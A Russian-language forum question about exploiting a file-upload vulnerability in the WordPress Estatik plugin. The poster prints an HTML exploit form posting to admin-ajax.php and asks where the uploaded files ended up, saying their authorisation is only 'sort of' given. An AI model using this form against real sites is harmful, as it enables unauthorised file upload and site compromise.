• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

25.09.2019
5
0
BIT
0
Имеется сайт, сразу скажу, что (Вроде как), мои действия на нём были разрешены мне, имеется вопрос, на сайте имеется уязвимость, плагин estatik имеется, есть соответственно так же сплойт-код
Код:
<html> <body> <form action="(САЙТ)/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="es_prop_media_images" />
<input type="file" name="es_media_images[]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Зашёл в директорию /wp-content/uploads И НИЧЕРТА, серьезно, загружал тхт, джпег, пнг файл и ничерта нет.
Все папки(кроме 1) в 2019-м пусты, куда может загрузился этот файл? ИБо даже wpscan показывает, что присутствует.

_ _ _ 2019-09-28 07-31-11.png
_ _ _ 2019-09-28 07-31-21.png
_ _ _ 2019-09-28 07-31-34.png
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!